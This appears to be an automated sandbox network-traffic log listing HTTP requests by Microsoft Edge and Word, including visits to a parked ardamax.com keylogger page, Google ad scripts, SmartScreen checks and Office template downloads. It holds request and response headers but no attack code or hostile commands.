x-request-id: 95cd4216-75cc-428f-9877-e7c368f5bd69
cache-control: no-store, max-age=0
accept-ch: sec-ch-prefers-color-scheme
critical-ch: sec-ch-prefers-color-scheme
vary: sec-ch-prefers-color-scheme
x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_Nr7n1+S7RguIBo6IcQ9qdOAiTRQkpfD/3qUvpvMfc01rELuhsgID3ec04wLerDeuj+NaIE1ySTNHU0tHfGlvbQ==
set-cookie: parking_session=95cd4216-75cc-428f-9877-e7c368f5bd69; expires=Wed, 04 Dec 2024 10:14:59 GMT; path=/
GET

http://ww7.ardamax.com/bXaYyztWU.js

msedge.exe

Remote address:

199.59.243.227:80

Request

GET /bXaYyztWU.js HTTP/1.1
Host: ww7.ardamax.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
DNT: 1
Accept: */*
Referer: http://ww7.ardamax.com/keylogger/?usid=19&utid=19445573727
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: parking_session=95cd4216-75cc-428f-9877-e7c368f5bd69

Response

HTTP/1.1 200 OK

date: Wed, 04 Dec 2024 09:59:59 GMT
content-type: application/javascript; charset=utf-8
content-length: 35064
x-request-id: 5af306b4-7fa4-4112-b524-1938f39e87a5
set-cookie: parking_session=95cd4216-75cc-428f-9877-e7c368f5bd69; expires=Wed, 04 Dec 2024 10:14:59 GMT
POST

http://ww7.ardamax.com/_fd?usid=19&utid=19445573727

msedge.exe

Remote address:

199.59.243.227:80

Request

POST /_fd?usid=19&utid=19445573727 HTTP/1.1
Host: ww7.ardamax.com
Connection: keep-alive
Content-Length: 0
Accept: application/json
DNT: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
Content-Type: application/json
Origin: http://ww7.ardamax.com
Referer: http://ww7.ardamax.com/keylogger/?usid=19&utid=19445573727
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: parking_session=95cd4216-75cc-428f-9877-e7c368f5bd69

Response

HTTP/1.1 200 OK

date: Wed, 04 Dec 2024 09:59:58 GMT
content-type: application/json; charset=utf-8
content-length: 6349
x-request-id: 6acf8b53-2c7b-44ce-ac9b-b4436839976f
set-cookie: parking_session=95cd4216-75cc-428f-9877-e7c368f5bd69; expires=Wed, 04 Dec 2024 10:14:59 GMT
POST

https://nav.smartscreen.microsoft.com/api/browser/edge/navigate/2

msedge.exe

Remote address:

51.140.244.186:443

Request

POST /api/browser/edge/navigate/2 HTTP/1.1
Connection: Keep-Alive
Content-Type: application/json
Authorization: SmartScreenHash eyJhdXRoSWQiOiIzODFkZGQxZS1lNjAwLTQyZGUtOTRlZC04YzM0YmY3M2YxNmQiLCJoYXNoIjoiQlF3NEFlbjZIT1E9Iiwia2V5IjoiY0dlUjlISUcvMmVIZE9mbTI5UlJDQT09In0=
User-Agent: SmartScreen/281479409434625
Content-Length: 1832
Host: nav.smartscreen.microsoft.com

Response

HTTP/1.1 200 OK

Date: Wed, 04 Dec 2024 09:59:59 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 898
Connection: keep-alive
Server: Kestrel
Cache-Control: max-age=0, private
Request-Context: appId=cid-v1:365e21c6-df19-4b1c-a612-b572489ace31
GET

https://www.google.com/adsense/domains/caf.js?abp=1&bodis=true

msedge.exe

Remote address:

172.217.16.228:443

Request

GET /adsense/domains/caf.js?abp=1&bodis=true HTTP/2.0
host: www.google.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: script
referer: http://ww7.ardamax.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
GET

https://www.google.com/sorry/index?continue=https://syndicatedsearch.goog/afs/ads%3Fadtest%3Doff%26psid%3D3113057640%26pcsa%3Dfalse%26channel%3Dpid-bodis-gcontrol97%252Cpid-bodis-gcontrol109%252Cpid-bodis-gcontrol439%252Cpid-bodis-gcontrol151%252Cpid-bodis-gcontrol160%26client%3Ddp-bodis31_3ph%26r%3Dm%26hl%3Den%26ivt%3D0%26rpbu%3Dhttp%253A%252F%252Fww7.ardamax.com%252F%253Fcaf%253D1%2526bpt%253D345%2526usid%253D19%2526utid%253D19445573727%26max_radlink_len%3D50%26type%3D3%26uiopt%3Dfalse%26swp%3Das-drid-2348603269777440%26oe%3DUTF-8%26ie%3DUTF-8%26fexp%3D21404%252C17300003%252C17301431%252C17301433%252C17301436%252C17301542%252C17301266%252C72717107%252C49280903%252C72771953%26format%3Dr3%26nocache%3D991733306390744%26num%3D0%26output%3Dafd_ads%26domain_name%3Dww7.ardamax.com%26v%3D3%26bsl%3D8%26pac%3D0%26u_his%3D1%26u_tz%3D0%26dt%3D1733306390745%26u_w%3D1280%26u_h%3D720%26biw%3D1280%26bih%3D601%26psw%3D1280%26psh%3D541%26frm%3D0%26uio%3D-%26cont%3Drs%26drt%3D0%26jsid%3Dcaf%26jsv%3D697661440%26rurl%3Dhttp%253A%252F%252Fww7.ardamax.com%252Fkeylogger%252F%253Fusid%253D19%2526utid%253D19445573727&hl=en&q=EgS117BTGJ_QwLoGIjCQogCwm8eRv7vM6sfOAPkPEsk_hAG_wkhAznNxRj5MPzUpHgEdIZ8NF8YcyjICh7kyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM

msedge.exe

Remote address:

172.217.16.228:443

Request

GET /sorry/index?continue=https://syndicatedsearch.goog/afs/ads%3Fadtest%3Doff%26psid%3D3113057640%26pcsa%3Dfalse%26channel%3Dpid-bodis-gcontrol97%252Cpid-bodis-gcontrol109%252Cpid-bodis-gcontrol439%252Cpid-bodis-gcontrol151%252Cpid-bodis-gcontrol160%26client%3Ddp-bodis31_3ph%26r%3Dm%26hl%3Den%26ivt%3D0%26rpbu%3Dhttp%253A%252F%252Fww7.ardamax.com%252F%253Fcaf%253D1%2526bpt%253D345%2526usid%253D19%2526utid%253D19445573727%26max_radlink_len%3D50%26type%3D3%26uiopt%3Dfalse%26swp%3Das-drid-2348603269777440%26oe%3DUTF-8%26ie%3DUTF-8%26fexp%3D21404%252C17300003%252C17301431%252C17301433%252C17301436%252C17301542%252C17301266%252C72717107%252C49280903%252C72771953%26format%3Dr3%26nocache%3D991733306390744%26num%3D0%26output%3Dafd_ads%26domain_name%3Dww7.ardamax.com%26v%3D3%26bsl%3D8%26pac%3D0%26u_his%3D1%26u_tz%3D0%26dt%3D1733306390745%26u_w%3D1280%26u_h%3D720%26biw%3D1280%26bih%3D601%26psw%3D1280%26psh%3D541%26frm%3D0%26uio%3D-%26cont%3Drs%26drt%3D0%26jsid%3Dcaf%26jsv%3D697661440%26rurl%3Dhttp%253A%252F%252Fww7.ardamax.com%252Fkeylogger%252F%253Fusid%253D19%2526utid%253D19445573727&hl=en&q=EgS117BTGJ_QwLoGIjCQogCwm8eRv7vM6sfOAPkPEsk_hAG_wkhAznNxRj5MPzUpHgEdIZ8NF8YcyjICh7kyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/2.0
host: www.google.com
upgrade-insecure-requests: 1
dnt: 1
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
sec-fetch-site: cross-site
sec-fetch-mode: navigate
sec-fetch-dest: iframe
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
sec-ch-ua-mobile: ?0
referer: http://ww7.ardamax.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
GET

https://syndicatedsearch.goog/afs/ads?adtest=off&psid=3113057640&pcsa=false&channel=pid-bodis-gcontrol97%2Cpid-bodis-gcontrol109%2Cpid-bodis-gcontrol439%2Cpid-bodis-gcontrol151%2Cpid-bodis-gcontrol160&client=dp-bodis31_3ph&r=m&hl=en&ivt=0&rpbu=http%3A%2F%2Fww7.ardamax.com%2F%3Fcaf%3D1%26bpt%3D345%26usid%3D19%26utid%3D19445573727&max_radlink_len=50&type=3&uiopt=false&swp=as-drid-2348603269777440&oe=UTF-8&ie=UTF-8&fexp=21404%2C17300003%2C17301431%2C17301433%2C17301436%2C17301542%2C17301266%2C72717107%2C49280903%2C72771953&format=r3&nocache=991733306390744&num=0&output=afd_ads&domain_name=ww7.ardamax.com&v=3&bsl=8&pac=0&u_his=1&u_tz=0&dt=1733306390745&u_w=1280&u_h=720&biw=1280&bih=601&psw=1280&psh=541&frm=0&uio=-&cont=rs&drt=0&jsid=caf&jsv=697661440&rurl=http%3A%2F%2Fww7.ardamax.com%2Fkeylogger%2F%3Fusid%3D19%26utid%3D19445573727

msedge.exe

Remote address:

216.58.201.110:443

Request

GET /afs/ads?adtest=off&psid=3113057640&pcsa=false&channel=pid-bodis-gcontrol97%2Cpid-bodis-gcontrol109%2Cpid-bodis-gcontrol439%2Cpid-bodis-gcontrol151%2Cpid-bodis-gcontrol160&client=dp-bodis31_3ph&r=m&hl=en&ivt=0&rpbu=http%3A%2F%2Fww7.ardamax.com%2F%3Fcaf%3D1%26bpt%3D345%26usid%3D19%26utid%3D19445573727&max_radlink_len=50&type=3&uiopt=false&swp=as-drid-2348603269777440&oe=UTF-8&ie=UTF-8&fexp=21404%2C17300003%2C17301431%2C17301433%2C17301436%2C17301542%2C17301266%2C72717107%2C49280903%2C72771953&format=r3&nocache=991733306390744&num=0&output=afd_ads&domain_name=ww7.ardamax.com&v=3&bsl=8&pac=0&u_his=1&u_tz=0&dt=1733306390745&u_w=1280&u_h=720&biw=1280&bih=601&psw=1280&psh=541&frm=0&uio=-&cont=rs&drt=0&jsid=caf&jsv=697661440&rurl=http%3A%2F%2Fww7.ardamax.com%2Fkeylogger%2F%3Fusid%3D19%26utid%3D19445573727 HTTP/2.0
host: syndicatedsearch.goog
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
sec-ch-ua-mobile: ?0
upgrade-insecure-requests: 1
dnt: 1
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
sec-fetch-site: cross-site
sec-fetch-mode: navigate
sec-fetch-dest: iframe
referer: http://ww7.ardamax.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
GET

https://partner.googleadservices.com/gampad/cookie.js?domain=ww7.ardamax.com&client=partner-dp-bodis31_3ph&product=SAS&callback=__sasCookie&cookie_types=v1%2Cv2

msedge.exe

Remote address:

142.250.179.226:443

Request

GET /gampad/cookie.js?domain=ww7.ardamax.com&client=partner-dp-bodis31_3ph&product=SAS&callback=__sasCookie&cookie_types=v1%2Cv2 HTTP/2.0
host: partner.googleadservices.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: script
referer: http://ww7.ardamax.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
GET

http://ww7.ardamax.com/keylogger/?usid=19&utid=19445573727

msedge.exe

Remote address:

199.59.243.227:80

Request

GET /keylogger/?usid=19&utid=19445573727 HTTP/1.1
Host: ww7.ardamax.com
Connection: keep-alive
Cache-Control: max-age=0
DNT: 1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: parking_session=95cd4216-75cc-428f-9877-e7c368f5bd69; __gsas=ID=a46cbb2a15906213:T=1733306399:RT=1733306399:S=ALNI_MaGVruzqYUiL_PQFkZI96lRxwGshA

Response

HTTP/1.1 200 OK

date: Wed, 04 Dec 2024 10:00:13 GMT
content-type: text/html; charset=utf-8
content-length: 1146
x-request-id: 61f51eca-7b51-4f75-b2f5-69c350a909a0
cache-control: no-store, max-age=0
accept-ch: sec-ch-prefers-color-scheme
critical-ch: sec-ch-prefers-color-scheme
vary: sec-ch-prefers-color-scheme
x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_Nr7n1+S7RguIBo6IcQ9qdOAiTRQkpfD/3qUvpvMfc01rELuhsgID3ec04wLerDeuj+NaIE1ySTNHU0tHfGlvbQ==
set-cookie: parking_session=95cd4216-75cc-428f-9877-e7c368f5bd69; expires=Wed, 04 Dec 2024 10:15:13 GMT
GET

http://ww7.ardamax.com/bqEuqGUlw.js

msedge.exe

Remote address:

199.59.243.227:80

Request

GET /bqEuqGUlw.js HTTP/1.1
Host: ww7.ardamax.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
DNT: 1
Accept: */*
Referer: http://ww7.ardamax.com/keylogger/?usid=19&utid=19445573727
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: parking_session=95cd4216-75cc-428f-9877-e7c368f5bd69; __gsas=ID=a46cbb2a15906213:T=1733306399:RT=1733306399:S=ALNI_MaGVruzqYUiL_PQFkZI96lRxwGshA

Response

HTTP/1.1 200 OK

date: Wed, 04 Dec 2024 10:00:13 GMT
content-type: application/javascript; charset=utf-8
content-length: 35064
x-request-id: 9492f5d6-18e5-4cb6-be81-4863fbb8c155
set-cookie: parking_session=95cd4216-75cc-428f-9877-e7c368f5bd69; expires=Wed, 04 Dec 2024 10:15:13 GMT
POST

http://ww7.ardamax.com/_fd?usid=19&utid=19445573727

msedge.exe

Remote address:

199.59.243.227:80

Request

POST /_fd?usid=19&utid=19445573727 HTTP/1.1
Host: ww7.ardamax.com
Connection: keep-alive
Content-Length: 0
Accept: application/json
DNT: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
Content-Type: application/json
Origin: http://ww7.ardamax.com
Referer: http://ww7.ardamax.com/keylogger/?usid=19&utid=19445573727
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: parking_session=95cd4216-75cc-428f-9877-e7c368f5bd69; __gsas=ID=a46cbb2a15906213:T=1733306399:RT=1733306399:S=ALNI_MaGVruzqYUiL_PQFkZI96lRxwGshA

Response

HTTP/1.1 200 OK

date: Wed, 04 Dec 2024 10:00:13 GMT
content-type: application/json; charset=utf-8
content-length: 6353
x-request-id: 82d49eec-c8df-4edc-94bf-853c681a36ef
set-cookie: parking_session=95cd4216-75cc-428f-9877-e7c368f5bd69; expires=Wed, 04 Dec 2024 10:15:14 GMT
POST

https://nav.smartscreen.microsoft.com/api/browser/edge/actions

msedge.exe

Remote address:

51.140.244.186:443

Request

POST /api/browser/edge/actions HTTP/1.1
Connection: Keep-Alive
Content-Type: application/json
Authorization: SmartScreenHash eyJhdXRoSWQiOiIzODFkZGQxZS1lNjAwLTQyZGUtOTRlZC04YzM0YmY3M2YxNmQiLCJoYXNoIjoiKzl0YzlTRThEQnM9Iiwia2V5IjoibThuelhGbkNoZzEwWVdQZTNrRzVtdz09In0=
User-Agent: SmartScreen/281479409434625
Content-Length: 1306
Host: nav.smartscreen.microsoft.com

Response

HTTP/1.1 200 OK

Date: Wed, 04 Dec 2024 10:01:31 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 192
Connection: keep-alive
Server: Kestrel
Cache-Control: max-age=0, private
Request-Context: appId=cid-v1:365e21c6-df19-4b1c-a612-b572489ace31
POST

https://nav.smartscreen.microsoft.com/api/browser/edge/navigate/2

msedge.exe

Remote address:

51.140.244.186:443

Request

POST /api/browser/edge/navigate/2 HTTP/1.1
Connection: Keep-Alive
Content-Type: application/json
Authorization: SmartScreenHash eyJhdXRoSWQiOiIzODFkZGQxZS1lNjAwLTQyZGUtOTRlZC04YzM0YmY3M2YxNmQiLCJoYXNoIjoiU1ZVclFib1RzTzg9Iiwia2V5IjoiK1JJSklhWXhockJYaGVWNFk3TVhqQT09In0=
User-Agent: SmartScreen/281479409434625
Content-Length: 1707
Host: nav.smartscreen.microsoft.com

Response

HTTP/1.1 200 OK

Date: Wed, 04 Dec 2024 10:01:32 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 854
Connection: keep-alive
Server: Kestrel
Cache-Control: max-age=0, private
Request-Context: appId=cid-v1:365e21c6-df19-4b1c-a612-b572489ace31
POST

https://nav.smartscreen.microsoft.com/api/browser/edge/navigate/2

msedge.exe

Remote address:

51.140.244.186:443

Request

POST /api/browser/edge/navigate/2 HTTP/1.1
Connection: Keep-Alive
Content-Type: application/json
Authorization: SmartScreenHash eyJhdXRoSWQiOiIzODFkZGQxZS1lNjAwLTQyZGUtOTRlZC04YzM0YmY3M2YxNmQiLCJoYXNoIjoiaU54U0hVN1R1am89Iiwia2V5IjoiYmRqZlJUUkw5YWYwaGtDd3ZrMFV0UT09In0=
User-Agent: SmartScreen/281479409434625
Content-Length: 1749
Host: nav.smartscreen.microsoft.com

Response

HTTP/1.1 200 OK

Date: Wed, 04 Dec 2024 10:01:46 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 952
Connection: keep-alive
Server: Kestrel
Cache-Control: max-age=0, private
Request-Context: appId=cid-v1:365e21c6-df19-4b1c-a612-b572489ace31
POST

https://nav.smartscreen.microsoft.com/api/browser/edge/navigate/2

msedge.exe

Remote address:

51.140.244.186:443

Request

POST /api/browser/edge/navigate/2 HTTP/1.1
Connection: Keep-Alive
Content-Type: application/json
Authorization: SmartScreenHash eyJhdXRoSWQiOiIzODFkZGQxZS1lNjAwLTQyZGUtOTRlZC04YzM0YmY3M2YxNmQiLCJoYXNoIjoiSmthcCs2WWxPV0k9Iiwia2V5IjoiODNUQlE3cTVlYUFaNjJqRHpJMG02Zz09In0=
User-Agent: SmartScreen/281479409434625
Content-Length: 1707
Host: nav.smartscreen.microsoft.com

Response

HTTP/1.1 200 OK

Date: Wed, 04 Dec 2024 10:01:32 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 854
Connection: keep-alive
Server: Kestrel
Cache-Control: max-age=0, private
Request-Context: appId=cid-v1:365e21c6-df19-4b1c-a612-b572489ace31
POST

https://roaming.officeapps.live.com/rs/RoamingSoapService.svc

Winword.exe

Remote address:

52.109.76.243:443

Request

POST /rs/RoamingSoapService.svc HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Content-Type: text/xml; charset=utf-8
User-Agent: MS-WebServices/1.0
SOAPAction: "http://tempuri.org/IRoamingSettingsService/GetConfig"
Content-Length: 511
Host: roaming.officeapps.live.com

Response

HTTP/1.1 200 OK

Cache-Control: private
Content-Type: text/xml; charset=utf-8
Server: Microsoft-IIS/10.0
X-OfficeFE: RoamingFE_IN_182
X-OfficeVersion: 16.0.18315.30575
X-OfficeCluster: neu-000.roaming.officeapps.live.com
Content-Security-Policy-Report-Only: script-src 'nonce-x8SW9jsGiSvuwE5fVB0GcWT01gSuSYl7GOaEKwFWdRFivzStFCDNYBR2Pm5+8fm2BgPsmx2aWW6OpFTjrVSKGA/lsBHIjCaakN69TaxQSA+0P6NcWK+DxOFtUNNmJuJp6dhzkEDbH5W5R0nU+yuK2WJKfsRaEHxguUFe2zVXMqU=' 'unsafe-inline' 'unsafe-eval' 'strict-dynamic' https:; base-uri 'self'; object-src 'none'; require-trusted-types-for 'script'; report-uri https://csp.microsoft.com/report/OfficeIce-OfficeRoaming-Prod
X-CorrelationId: 6744752c-2043-4691-8420-c3f7b4aa4206
X-Powered-By: ASP.NET
Date: Wed, 04 Dec 2024 10:02:39 GMT
Content-Length: 654
GET

https://metadata.templates.cdn.office.net/client/templates/gallery?lcid=1033&syslcid=1033&uilcid=1033&app=0&ver=16&tl=2&build=16.0.12527&gtype=0%2C1%2C2%2C5%2C

Winword.exe

Remote address:

92.123.26.217:443

Request

GET /client/templates/gallery?lcid=1033&syslcid=1033&uilcid=1033&app=0&ver=16&tl=2&build=16.0.12527&gtype=0%2C1%2C2%2C5%2C HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: 20E73B12-7985-4ACC-99E0-02D2E997C7D2
Host: metadata.templates.cdn.office.net

Response

HTTP/1.1 200 OK

Content-Type: text/xml
Server: Kestrel
Content-Encoding: gzip
Content-Length: 1264
Cache-Control: max-age=203184
Date: Wed, 04 Dec 2024 10:02:55 GMT
Connection: keep-alive
Vary: Accept-Encoding
GET

https://binaries.templates.cdn.office.net/support/templates/en-us/tp01840907.cab

Winword.exe

Remote address:

23.73.137.235:443

Request

GET /support/templates/en-us/tp01840907.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: 20E73B12-7985-4ACC-99E0-02D2E997C7D2
Host: binaries.templates.cdn.office.net

Response

HTTP/1.1 200 OK

Content-Length: 43653
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: 2jOARYFw5gy+pyYC/dDZVQ==
Last-Modified: Fri, 22 Apr 2016 16:08:15 GMT
ETag: 0x8D36AC84F8E1FB0
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: d47d4a02-201e-00a9-0e0f-ba4b58000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Wed, 04 Dec 2024 10:02:56 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
GET

https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851216.cab

Winword.exe

Remote address:

23.73.137.235:443

Request

GET /support/templates/en-us/tp02851216.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: 20E73B12-7985-4ACC-99E0-02D2E997C7D2
Host: binaries.templates.cdn.office.net

Response

HTTP/1.1 200 OK

Content-Length: 34816
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: YoYxJM3NoTXswOcieCy4iA==
Last-Modified: Fri, 22 Apr 2016 16:09:38 GMT
ETag: 0x8D36AC8813CE0D3
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 4196af4e-901e-003f-4990-2d48e6000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Wed, 04 Dec 2024 10:02:56 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
GET

https://binaries.templates.cdn.office.net/support/templates/en-us/tp1000111502.cab

Winword.exe

Remote address:

23.73.137.235:443

Request

GET /support/templates/en-us/tp1000111502.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: 20E73B12-7985-4ACC-99E0-02D2E997C7D2
Host: binaries.templates.cdn.office.net

Response

HTTP/1.1 200 OK

Content-Length: 230916
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: k/qfd5Ugqy0irE6oZLe7NA==
Last-Modified: Thu, 12 Jul 2018 00:23:55 GMT
ETag: 0x8D5E78DC0BDFFD8
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: b597281b-e01e-00c0-4097-a0b22d000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Wed, 04 Dec 2024 10:02:56 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
GET

https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851218.cab

Winword.exe

Remote address:

23.73.137.235:443

Request

GET /support/templates/en-us/tp02851218.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: 20E73B12-7985-4ACC-99E0-02D2E997C7D2
Host: binaries.templates.cdn.office.net

Response

HTTP/1.1 200 OK

Content-Length: 31835
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: kqgZ1DSoquosZfDMLzO7Og==
Last-Modified: Fri, 22 Apr 2016 16:09:39 GMT
ETag: 0x8D36AC881E66CE5
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 7ac92116-501e-008c-3524-b9e224000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Wed, 04 Dec 2024 10:02:56 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
GET

https://binaries.templates.cdn.office.net/support/templates/en-us/tp02835233.cab

Winword.exe

Remote address:

23.73.137.235:443

Request

GET /support/templates/en-us/tp02835233.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: 20E73B12-7985-4ACC-99E0-02D2E997C7D2
Host: binaries.templates.cdn.office.net

Response

HTTP/1.1 200 OK

Content-Length: 46413
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: xFXEvEvsng2mfE0eU+RtWg==
Last-Modified: Fri, 22 Apr 2016 16:09:25 GMT
ETag: 0x8D36AC879BBB45C
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: bcca83ea-301e-000c-1015-b91d22000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Wed, 04 Dec 2024 10:02:56 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
GET

https://binaries.templates.cdn.office.net/support/templates/en-us/tp0403392501.cab

Winword.exe

Remote address:

23.73.137.235:443

Request

GET /support/templates/en-us/tp0403392501.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: 20E73B12-7985-4ACC-99E0-02D2E997C7D2
Host: binaries.templates.cdn.office.net

Response

HTTP/1.1 200 OK

Content-Length: 1310275
